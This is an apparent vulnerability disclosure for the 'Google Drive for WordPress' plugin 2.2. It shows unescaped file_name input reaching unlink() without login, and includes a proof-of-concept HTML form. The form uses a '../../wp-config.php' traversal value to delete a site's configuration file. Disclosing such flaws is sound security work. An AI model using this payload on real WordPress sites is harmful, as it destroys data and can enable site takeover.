Details
- Name : Google Drive for WordPress
- Version : 2.2
- Homepage : https://wordpress.org/plugins/wp-google-drive/
Description
- Type user access: Don't need of login .
- $_POST[‘file_name’] is not escaped.
Code
File: wp-content/plugins/wp-google-drive/gdrive-ajaxs.php
Line: 15 - 22
switch ( $_POST['ajaxstype'] ) {
...
case 'del_fl_bkp':
gd_delete_listById( $_POST['id'] );
$dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH . "/" . $_POST['file_name'];
unlink( $dir );
Proof Concept
1 - Send data form:
<form method="post"
action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
<input type="text" name="ajaxstype" value="del_fl_bkp">
<input type="text" name="file_name" value="../../wp-config.php">
<input type="text" name="id" value="1">
<input type="submit">
</form>
<?php
Results
file wp-config.php deleted and possibilited to restart all system
Note
Solution
Timeline
- Date Discovery : 11/25/2017
- Date Vendor Contact : 12/26/2017
- Date Publish :
- Date Resolution :